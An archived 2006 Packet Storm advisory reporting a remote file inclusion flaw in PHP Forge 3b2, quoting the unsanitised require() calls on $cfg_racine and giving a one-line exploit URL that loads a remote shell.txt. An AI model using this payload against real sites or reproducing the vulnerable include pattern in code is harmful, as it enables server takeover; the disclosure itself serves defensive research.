PHPForge3b2.txt

2006-10-20T00:00:00
ID PACKETSTORM:51148
Type packetstorm
Reporter Mahmood_ali
Modified 2006-10-20T00:00:00

Description

                                        
                                            `PHP Forge 3b2 (/inc/inc.php) Remote File Include Vulnerability  
############  
  
Source Code:  
http://www.comscripts.com/jump.php?action=script&id=697  
############  
  
Vulnerable Code:_  
require($cfg_racine."inc/vars.php");  
require($cfg_racine."inc/config.php");  
require($cfg_racine."inc/fonctions.php");  
require($cfg_racine."inc/systeme.php");  
require($cfg_racine."inc/mysql.php");  
require($cfg_racine."inc/membres.php");  
############  
  
Exploit :  
http://www.test.com/[Php_Forge]//inc/inc.php?cfg_racine=shell.txt?  
############  
  
Discoverd By : Mahmood_ali  
Conatact : mah_k_2000@hotmail.com  
############  
  
Special Greetings :_ Tryag-Team  
############  
  
bugtraq@securityfocus.com  
  
submit@milw0rm.com  
  
_________________________________________________________________  
The new Windows Live Toolbar helps you guard against viruses   
http://toolbar.live.com/?mkt=en-gb  
  
`